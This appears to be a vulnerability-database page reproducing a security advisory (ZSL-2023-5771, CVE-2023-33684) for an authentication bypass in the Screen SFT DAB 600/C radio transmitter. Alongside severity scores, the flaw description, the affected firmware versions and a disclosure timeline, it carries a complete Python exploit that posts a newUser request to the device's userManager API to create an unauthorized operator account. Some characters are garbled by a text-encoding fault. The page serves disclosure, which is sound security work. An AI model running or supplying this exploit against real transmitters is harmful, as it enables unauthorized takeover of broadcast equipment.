5.7 Medium
CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
5.7 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.2%
Title: Screen SFT DAB 600/C Authentication Bypass Account Creation Exploit
Advisory ID: ZSL-2023-5771
Type: Local/Remote
Impact: Privilege Escalation, Security Bypass
Risk: (4/5)
Release Date: 13.05.2023
Screenโs new radio DAB Transmitter is reaching the highest technology level in both Digital Signal Processing and RF domain. SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the digital adaptive precorrection and configuatio flexibility, the Hot Swap System technology, the compactness and the smart system design, the SFT DAB are advanced transmitters. They support standards DAB, DAB+ and T-DMB and are compatible with major headend brands.
The application suffers from a weak session management that can allow an attacker on the same network to bypass these controls by reusing the same IP address assigned to the victim user (NAT) and exploit crucial operations on the device itself. By abusing the IP address property that is binded to the Session ID, one needs to await for such an established session and issue unauthorized requests to the vulnerable API to manage and/or manipulate the affected transmitter.
DB Elettronica Telecomunicazioni SpA - <https://www.screen.it> | <https://www.dbbroadcast.com>
Firmware: 1.9.3
Bios firmware: 7.1 (Apr 19 2021)
Gui: 2.46
FPGA: 169.55
uc: 6.15
Keil-EWEB/2.1
MontaVistaยฎ Linuxยฎ Carrier Grade eXpress (CGX)
[19.03.2023] Vulnerability discovered.
[20.03.2023] Vendor contacted.
[12.05.2023] No response from the vendor.
[13.05.2023] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php>
[2] <https://vulners.com/cve/CVE-2023-33684>
[3] <https://nvd.nist.gov/vuln/detail/CVE-2023-33684>
[4] <https://www.exploit-db.com/exploits/51455>
[5] <https://packetstormsecurity.com/files/172326/>
[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/257467>
[13.05.2023] - Initial release
[26.07.2023] - Added reference [2] and [3]
[12.10.2023] - Added reference [4] and [5]
[26.10.2023] - Added reference [6]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/env python3
#
#
# Screen SFT DAB 600/C Authentication Bypass Account Creation Exploit
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
# MontaVistaยฎ Linuxยฎ Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5771
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
โโโโโโ โโโโโโโ โโโ โโโ โโ โโโ โโ โโโโโโ โโโโโโโ โโโโโโ
โโ โโ โโ โโโโ โโโโ โโ โโโโ โโ โโ โโ โโ โโ โโ
โโโโโโ โโโโโ โโ โโโโ โโ โโ โโ โโ โโ โโ โโ โโโโโ โโโโโโ
โโ โโ โโ โโ โโ โโ โโ โโ โโ โโ โโ โโ โโ โโ โโ
โโ โโ โโโโโโโ โโ โโ โโ โโ โโโโ โโโโโโ โโโโโโโ โโ โโ
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::newUser')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber++',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'userManager',
'ssbtObj':{
'newUser':{
'password':h,
'type':'OPERATOR',
'username':u
}
},
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-5)
</p></body></html>
5.7 Medium
CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
5.7 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.2%